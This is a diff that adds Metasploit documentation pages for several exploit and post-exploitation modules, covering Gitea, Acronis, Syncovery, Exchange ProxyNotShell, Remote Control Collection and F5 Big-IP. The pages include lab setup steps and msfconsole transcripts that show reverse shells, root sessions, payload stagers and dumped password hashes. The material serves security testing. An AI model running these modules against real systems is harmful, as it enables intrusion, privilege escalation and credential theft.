+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:37790) at 2022-11-18 17:44:31 -0600
+
+
+meterpreter > getpid
+Current pid: 452
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 8eeaa82293b4
+OS          : Linux 8eeaa82293b4 5.15.0-53-generic #59-Ubuntu SMP Mon Oct 17 18:53:30 UTC 2022 x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,229 @@
+## Vulnerable Application
+
+[Gitea](https://gitea.io/) is a painless self-hosted Git service community
+managed lightweight code hosting solution written in Go.
+
+This module has been tested successfully on Gitea versions:
+* 1.16.6 with Git 2.30.3 (Docker)
+* 1.16.6 with Git 2.30.2 (Windows 10)
+
+### Description
+
+This module exploits Git fetch command in Gitea repository migration process that leads to a remote command execution on the system.
+This vulnerability affect Gitea before 1.16.7 version.
+
+The migration process require valid Git repository address so the module will
+use the Gitea target itself by creating a temporary repository. This scenario
+won't work with [Gitea default configuration](https://github.com/go-gitea/gitea/blob/main/custom/conf/app.example.ini)
+because `ALLOW_LOCALNETWORKS` is disabled. However, it will be ignored when
+[ALLOWED_DOMAINS](https://github.com/go-gitea/gitea/blob/main/custom/conf/app.example.ini#L2289)
+is set, but it must be set to all domain with `*` for this scenario to work.
+
+There is an update in the Git-remote command line starting from version 2.34.0
+which refuses to update the branch pull request URL to the current path.
+
+```
+\testrepo.git>git version
+git version 2.34.0.windows.1
+\testrepo.git>git remote add -f master ./
+Updating master
+fatal: bad object refs/pull/0/head
+error: ./ did not send all necessary objects
+
+error: Could not fetch master
+```
+This causes the exploit to fail because Git-fetch will not executed if the
+Git-remote fail. Details of these limitation are explained
+[here](https://tttang.com/archive/1607/)
+
+### Source and Installers
+
+* [Source Code Repository](https://github.com/go-gitea/gitea/)
+* [Installers](https://dl.gitea.io/gitea/1.16.6)
+* [Docker](https://docs.gitea.io/en-us/install-with-docker/)
+
+### Docker installation
+1. create `docker-compose.yml` file
+```
+version: "3"
+
+networks:
+  gitea:
+    external: false
+
+services:
+  server:
+    image: gitea/gitea:1.16.6
+    container_name: gitea
+    environment:
+      - USER_UID=1000
+      - USER_GID=1000
+    restart: always
+    networks:
+      - gitea
+    volumes:
+      - ./gitea:/data
+      - /etc/timezone:/etc/timezone:ro
+      - /etc/localtime:/etc/localtime:ro
+    ports:
+      - "3000:3000"
+      - "222:22"
+```
+2. run `docker-compose up`
+3. append `ALLOW_LOCALNETWORKS` in the configuration file.
+```
+:~$ cat << EOF >> gitea/gitea/conf/app.ini
+> [migrations]
+> ALLOW_LOCALNETWORKS = true
+> EOF
+```
+4. Navigate to the localhost port 3000 and finish the installation. Note that
+   the first registered user will automatically become administrator so make
+   sure to set the administrator username and password upon installation.
+
+## Verification Steps
+
+1. Navigate to `/user/sign_up` and register normal user
+2. Do: `use unix/webapp/gitea_git_fetch_rce`
+3. Do: `set RHOSTS [ips]`
+4. Do: `set LHOST [lhost]`
+5. Do: `set USERNAME [username]`
+6. Do: `set PASSWORD [password]`
+7. Do: `run`
+8. You should get a shell.
+
+## Options
+
+### USERNAME
+The Gitea valid username to authenticate
+
+### USERNAME
+The Gitea valid password to authenticate
+
+### HTTPDELAY
+Number of seconds the web server will wait to deliver payload (default: 12)
+
+## Scenarios
+### Successful exploitation of Gitea 1.16.6 on Docker
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
+username => msf
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
+password => qwerty
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://172.17.0.1:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/pulls
+[*] Adding hardcoded uri /api/v1/repos/msf/d8s1ZLsl/topics
+[*] Creating repository "u8W2Lu24p"
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgAB..."]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAA...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Migrating repository
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3020772 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:60744) at 2022-10-03 18:40:15 +0700
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: git
+```
+
+### Successful exploitation of Gitea 1.16.6 on Windows 10
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set target 2
+target => 2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 192.168.0.21
+rhosts => 192.168.0.21
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 192.168.0.104
+lhost => 192.168.0.104
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username yo
+username => yo
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password password
+password => password
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 192.168.0.104:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://192.168.0.104:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/pulls
+[*] Adding hardcoded uri /api/v1/repos/yo/Gu5em72aTm5/topics
+[*] Creating repository "ExcLF0xBxG"
+[+] Repository created
+[*] Executing command: powershell.exe -nop -w hidden -noni -ep bypass "&([...
+[*] Migrating repository
+[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
+[*] Migrating repository
+[*] Powershell session session 1 opened (192.168.0.104:4444 -> 192.168.0.21:49499) at 2022-10-03 19:03:38 +0700
+[*] Server stopped.
+
+PS C:\Users\msf\Downloads\data\gitea-repositories\yo\gu5em72atm5.git> whoami
+msf
+```
+
+### Failed exploitation due to migration settings
+
+```
+msf6 > use exploit/multi/http/gitea_git_fetch_rce
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set username msf
+username => msf
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set password qwerty
+password => qwerty
+msf6 exploit(multi/http/gitea_git_fetch_rce) > set verbose true
+verbose => true
+msf6 exploit(multi/http/gitea_git_fetch_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 1.16.6
+[*] Using URL: http://172.17.0.1:8080/
+[*] Server started.
+[*] Adding hardcoded uri /api/v1/version
+[*] Adding hardcoded uri /api/v1/settings/api
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/pulls
+[*] Adding hardcoded uri /api/v1/repos/msf/9JDwz2xTngq7w/topics
+[*] Creating repository "P7EpcvA"
+[+] Repository created
+[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAA..."]
+[*] Executing command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAAB...
+[*] Command Stager progress - 100.00% done (833/833 bytes)
+[*] Migrating repository
+[*] Server stopped.
+[-] Exploit aborted due to failure: unexpected-reply: Unable to migrate repo:
+You can not import from disallowed hosts, please ask the admin to check
+ALLOWED_DOMAINS/ALLOW_LOCALNETWORKS/BLOCKED_DOMAINS settings.
+[*] Exploit completed, but no session was created.
+```
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+Acronis TrueImage versions 2019 update 1 through 2021 update 1
+are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
+helper tool does not perform any validation on connecting clients,
+which gives arbitrary clients the ability to execute functions provided
+by the helper tool with `root` privileges.
+
+This module connects to the helper tool and executes the payload via
+the helper tool's `executeProcess:arguments:caller:withReply:;` function,
+granting a session as `root`.
+
+### Installation Instructions
+
+Run through the installer with all of the defaults. Once the application
+is installed, open the application and allow the privileges requested.
+That should be enough for the helper tool to be placed in the
+`/Library/PrivilegedHelperTools` directory. You should not have to set up
+a trial to get the exploit to work.
+
+*Note* The 2021 version of Acronis TrueImage comes with an uninstaller
+that will remove the helper tool if used. However, if the software is
+uninstalled via the drag-and-drop method, the helper tool will be left behind.
+The 2020 version does not appear to come with an uninstaller, so the helper tool
+will need to be manually deleted from `/Library/PrivilegedHelperTools` when
+uninstalling the software.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a meterpreter or shell session on the target
+4. Do: `use exploit/osx/local/acronis_trueimage_xpc_privesc`
+5. Do: `set SESSION <session_no>`
+6. Do: `run`
+7. You should get a new session as root.
+
+## Options
+
+### WRITABLE_DIR
+
+Directory to use to write exploit files to
+
+### SHELL
+
+Default shell to use for exploit
+
+### COMPILE
+
+Determines if exploit will be compiled on the target or if a pre-compiled exploit
+will be used.
+
+## Scenarios
+
+### Acronis TrueImage Build 22510 on macOS 12.5
+
+```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Transmitting first stager...(214 bytes)
+[*] Transmitting second stager...(49152 bytes)
+[*] Sending stage (810648 bytes) to 192.168.140.204
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.204:53610) at 2022-11-15 08:44:36 -0600
+
+meterpreter > getuid
+Server username: space
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           :  (macOS 12.5.0)
+Architecture : x64
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use exploit/osx/local/acronis_trueimage_xpc_privesc
+[*] Using configured payload osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set session 1
+session => 1
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set lport 5555
+lport => 5555
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set verbose true
+verbose => true
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable build 22510 found
+[*] Attempting to write payload at /tmp/FHQUXzNR
+[*] Writing '/tmp/FHQUXzNR' (17204 bytes) ...
+[+] Successfully wrote payload at /tmp/FHQUXzNR
+[*] Successfully compiled iZMwhN.m...Now executing payload
+[*] Transmitting first stager...(214 bytes)
+[*] Transmitting second stager...(49152 bytes)
+[*] Sending stage (810648 bytes) to 192.168.140.204
+[+] Deleted /tmp/FHQUXzNR
+[+] Deleted /tmp/iZMwhN.m
+[+] Deleted /tmp/iZMwhN
+[*] Meterpreter session 2 opened (192.168.140.1:5555 -> 192.168.140.204:53763) at 2022-11-15 08:45:13 -0600
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           :  (macOS 12.5.0)
+Architecture : x64
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module exploits an authenticated remote code execution vulnerability (CVE-2022-36534)
+in the Web GUI of Syncovery File Sync & Backup Software for Linux.
+Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.
+Jobs can contain arbitrary system commands and will be executed as the user `root`.
+A valid username and password or a session token is needed to exploit the vulnerability.
+
+This affects Syncovery for Linux before v9.48j and all versions of the obsolete branch 8.
+
+Installing a vulnerable version of Syncovery for Linux to test this vulnerability is quite easy.
+Download a vulnerable version of Syncovery for Linux: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
+Install it and once the server is up, you can access it on port 8999 for testing...
+
+## Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+## Platforms
+
+- Unix
+
+## Verification Steps
+
+1. `use exploit/unix/http/syncovery_linux_rce_2022_36534`
+2. `set RHOSTS <TARGET HOSTS>`
+3. `set LHOST <Address of Attacking Machine>`
+4. `run`
+5. You should get a meterpreter shell as the `root` user.
+
+## Options
+
+### USERNAME
+Username used for login. Default is "default".
+
+### PASSWORD
+Password used for login. Default is "pass".
+
+### TOKEN
+Instead of using a username and password it is also possible to use an authentication token.
+A valid token might be successfully brute-forced with the scanner module `syncovery_linux_token_cve_2022_36536`.
+
+### TARGETURI
+The path to Syncovery login.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use exploits/unix/http/syncovery_linux_rce_2022_36534
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > set lhost 192.168.178.26
+lhost => 192.168.178.26
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > options
+
+Module options (exploit/unix/http/syncovery_linux_rce_2022_36534):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   pass             yes       The password to Syncovery (default: pass)
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The path to Syncovery
+   TOKEN                       no        A valid session token
+   USERNAME   default          yes       The username to Syncovery (default: default)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.178.26   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Syncovery for Linux < 9.48j
+
+
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > check
+[+] 192.168.178.26:8999 - The target is vulnerable.
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > run
+
+[*] Started reverse TCP handler on 192.168.178.26:4444 
+[+] 192.168.178.26:8999 - Exploit successfully executed
+[*] Sending stage (40132 bytes) to 192.168.178.26
+[*] Meterpreter session 1 opened (192.168.178.26:4444 -> 192.168.178.26:38008) at 2022-09-06 13:44:13 +0200
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 5.16.0-kali7-amd64 #1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+
+This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker
+to interact with the Exchange Powershell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to
+obtain code execution (CVE-2022-41082). This exploit only support Exchange Server 2019.
+
+By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
+
+This vulnerability affects:
+
+  * Exchange 2013 CU23 < 15.0.1497.44
+  * Exchange 2016 CU22 < 15.1.2375.37
+  * Exchange 2016 CU23 < 15.1.2507.16
+  * Exchange 2019 CU11 < 15.2.986.36
+  * Exchange 2019 CU12 < 15.2.1118.20
+
+*Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: November 8, 2022 (KB5019758)][1]*
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use exploit/windows/http/exchange_proxynotshell_rce`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USERNAME [USERNAME]`
+5. Do: `set PASSWORD [PASSWORD]`
+6. Do: `run`
+
+## Advanced Options
+### EemsBypass
+
+Technique to bypass the EEMS rule.
+
+**none** -- Make no attempt to bypass the EEMS rule. This can be used with the `check` method to determine if the EEMS 
+M1 rule is applied.
+**IBM037v1** -- Use IBM037 encoding combined with the `X-Up-Devcap-Post-Charset` header and `UP` User-Agent prefix. See
+[ProxyNotRelay][2] for more information.
+
+### MaxBackendRetries
+
+The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments
+where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
+
+## Scenarios
+
+### Version and OS
+
+```
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
+RHOSTS => 192.168.159.11
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
+USERNAME => aliddle
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
+PASSWORD => Password1!
+msf6 exploit(windows/http/exchange_proxynotshell_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Sending stage (175686 bytes) to 192.168.159.11
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500
+
+meterpreter > 
+```
+
+[1]: https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-2016-and-2013-november-8-2022-kb5019758-2b3b039b-68b9-4f35-9064-6b286f495b1d
+[2]: https://rw.md/2022/11/09/ProxyNotRelay.html
@@ -10,9 +10,9 @@ This vulnerability affects:

  * Exchange 2013 CU23 < 15.0.1497.15
  * Exchange 2016 CU19 < 15.1.2176.12
-  * Exchange 2016 CU20 < 15.1.2242.5
+  * Exchange 2016 CU20 < 15.1.2242.8
  * Exchange 2019 CU8 < 15.2.792.13
-  * Exchange 2019 CU9 < 15.2.858.9
+  * Exchange 2019 CU9 < 15.2.858.10

 *Source: [Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: April 13, 2021 (KB5001779)][1]*

@@ -87,6 +87,11 @@ The path where you want to write the backdoor. Default: `aspnet_client`

 This is MAPI client version sent in the request.

+### MaxBackendRetries
+
+The maximum number of times to retry for targeting the backend server with the SSRF. This is useful in environments
+where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
+
 ## Scenarios

 ### Exchange 2016 CU 19 on Server 2016
@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+This module utilizes the Remote Control Server's, part
+of the Remote Control Collection by Steppschuh, protocol
+to deploy a payload and run it from the server.  This module will only deploy
+a payload if the server is set without a password (default).
+Tested against 3.1.1.12, current at the time of module writing
+
+Version 3.1.1.12 can be downloaded from http://remote-control-collection.com/
+    
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/windows/misc/remote_control_collection_rce`
+4. Set `rhost` and `lhost` as required.
+5. Do: `run`
+6. You should get a shell as the user who is running Remote Mouse.
+
+## Options
+
+### PATH
+
+The location to write the payload to
+Defaults to `%temp%\\` aka `c:\\Windows\\Temp\\` on most systems.
+
+### SLEEP
+
+The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
+Defaults to `1`.
+
+## Scenarios
+
+###  Remote Control Server 3.1.1.12 on Windows 10
+
+```
+resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_mouse.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_mouse.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_mouse.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_mouse_rce) > run
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] 1.1.1.1:1978 - Running automatic check ("set AutoCheck false" to disable)
+[+] 1.1.1.1:1978 - The target appears to be vulnerable. Received handshake with version: 411
+[*] 1.1.1.1:1978 - Connecting
+[*] 1.1.1.1:1978 - Sending Windows key
+[*] 1.1.1.1:1978 - Opening command prompt
+[*] 1.1.1.1:1978 - Sending stager
+[*] 1.1.1.1:1978 - Using URL: http://2.2.2.2:8080/
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[+] 1.1.1.1:1978 - Payload request received, sending 73802 bytes of payload for staging
+[*] 1.1.1.1:1978 - Executing payload
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 1.1.1.1
+[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49962) at 2022-09-27 16:33:02 -0400
+[*] 1.1.1.1:1978 - Server stopped.
+[!] 1.1.1.1:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.16299.125]
+-----
+          
+
+C:\Users\windows>whoami 
+whoami
+win10prolicense\windows
+
+C:\Users\windows>systeminfo
+systeminfo
+
+Host Name:                 WIN10PROLICENSE
+OS Name:                   Microsoft Windows 10 Pro
+OS Version:                10.0.16299 N/A Build 16299
+```
+
+###  Remote Control Server 3.1.1.12 on Windows 10, with a password
+
+Expected to fail.
+
+```
+resource (remote_control_collection.rb)> use exploits/windows/misc/remote_control_collection_rce
+[*] Using configured payload windows/shell/reverse_tcp
+resource (remote_control_collection.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (remote_control_collection.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (remote_control_collection.rb)> set verbose true
+verbose => true
+msf6 exploit(windows/misc/remote_control_collection_rce) > exploit
+
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Connecting and Sending Windows key
+[*] Opening command prompt
+[*] Sending stager
+[*] Using URL: http://2.2.2.2:8080/
+[*] Executing payload
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'c:\Windows\Temp\OqsTi76PX80it.exe' on the target
+[*] Exploit completed, but no session was created
+```
@@ -13,6 +13,9 @@ with BusyBox telnetd installed.
  The command telnetd will execute on connect. The default value is `/bin/sh`
  in order to provide a command shell.

+  **TelnetdPath**
+  The path to the telnetd executable on disk. The default value is `telnetd`.
+
 ### Advanced

  **CommandShellCleanupCommand**
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module will check which shell commands are available on a system.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/linux/gather/enum_commands`
+1. Do: `set session <session ID>`
+1. Do: `run`
+1. You should receive a list of shell commands
+
+
+## Options
+
+### DIR
+
+Optional directory name to list (in addition to default system PATH and common paths)
+
+
+## Scenarios
+
+### Ubuntu 22.04.1 (x86_64)
+
+```
+msf6 > use post/linux/gather/enum_commands 
+msf6 post(linux/gather/enum_commands) > set session 1
+session => 1
+msf6 post(linux/gather/enum_commands) > run
+
+[+] Found 3795 executable binaries/commands
+/bin/GET
+/bin/HEAD
+/bin/POST
+/bin/VGAuthService
+/bin/X
+/bin/X11
+/bin/Xephyr
+/bin/Xorg
+/bin/Xwayland
+/bin/[
+/bin/aa-enabled
+/bin/aa-exec
+/bin/aa-features-abi
+
+...
+
+[*] Post module execution completed
+msf6 post(linux/gather/enum_commands) > 
+```
@@ -0,0 +1,48 @@
+## Vulnerable Application
+
+This module collects 802-11-Wireless-Security credentials such as
+Access-Point name and Pre-Shared-Key from Linux NetworkManager
+connection configuration files.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a `root` session
+1. Do: `use post/linux/gather/enum_psk`
+1. Do: `set session <session ID>`
+1. Do: `run`
+1. You should receive credentails for wireless connections
+
+
+## Options
+
+### DIR
+
+The path for NetworkManager configuration files (default: `/etc/NetworkManager/system-connections/`)
+
+
+## Scenarios
+
+### Ubuntu 22.04.1 (x86_64)
+
+```
+msf6 > use post/linux/gather/enum_psk 
+msf6 post(linux/gather/enum_psk) > set session 1
+session => 1
+msf6 post(linux/gather/enum_psk) > run
+
+[*] Reading file /etc/NetworkManager/system-connections//Profile 1.nmconnection
+[*] Reading file /etc/NetworkManager/system-connections//test
+
+802-11-wireless-security
+========================
+
+ AccessPoint-Name  PSK
+ ----------------  ---
+ test              1234567890
+
+[+] Credentials stored in: /root/.msf4/loot/20221120081233_default_192.168.200.204_linux.psk.creds_045512.txt
+[*] Post module execution completed
+msf6 post(linux/gather/enum_psk) > 
+```
@@ -0,0 +1,137 @@
+## Vulnerable Application
+
+The application is F5 Big-IP, and I don't think the versions matters but I
+tested on version 17.0.0.1. It can be downloaded as a VMWare image for free
+(you have to create an account) from https://downloads.f5.com. You can register
+for a free 30-day trial if you like, but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: Get any session somehow (`exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800` works well on 17.0.0.1 and earlier, or just use `msfvenom` w/ a Linux payload)
+4. Do: `use post/linux/gather/f5_loot_mcp`
+5. Do `set SESSION <sessionid>`
+6. Do: `run`
+7. You should get the info
+
+## Options
+
+### GATHER_HASHES
+
+If `true`, read a list of local users and passwords (`userdb_entry` values) from mcp.
+
+Default: true
+
+### GATHER_SERVICE_PASSWORDS
+
+If `true`, read upstream service passwords (active directory, LDAP, etc) from different parts of mcp.
+
+Default: true
+
+### GATHER_DB_VARIABLES
+
+If `true`, read configuration information from mcp (note that this is slow).
+
+Default: false (due to the speed)
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1 with a root session
+
+First, get a non-root session however you can. I used the rpmspec vuln:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword mybigtestpassword
+HttpPassword => iagotestbigip
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/708677fa-5b30-43e6-9ce3-d84046e9f6e9.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/yE15kZeAwp-1.6.1-7.4.4.noarch.rpm
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:36124) at 2022-11-14 16:12:04 -0800
+
+meterpreter > bg
+```
+
+Then just use the module, set the SESSION, and run it:
+
+```
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > use post/linux/gather/f5_loot_mcp
+msf6 post(linux/gather/f5_loot_mcp) > set SESSION 1
+SESSION => 1
+msf6 post(linux/gather/f5_loot_mcp) > set VERBOSE true
+VERBOSE => true
+msf6 post(linux/gather/f5_loot_mcp) > show options
+
+Module options (post/linux/gather/f5_loot_mcp):
+
+   Name                       Current Setting  Required  Description
+   ----                       ---------------  --------  -----------
+   GATHER_DB_VARIABLES        false            yes       Gather database variables (warning: slow)
+   GATHER_HASHES              true             yes       Gather password hashes from mcp
+   GATHER_UPSTREAM_PASSWORDS  true             yes       Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from mcp
+   SESSION                    1                yes       The session to run this module on
+
+
+View the full module info with the info, or info -d command.
+
+msf6 post(linux/gather/f5_loot_mcp) > run
+
+[*] Gathering users and password hashes from MCP
+[+] admin:$6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi2j0mh.ww9i1
+[+] f5hubblelcdadmin:yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG
+[+] root:$6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr0gocIIyMoc1
+[*] Gathering upstream passwords from MCP
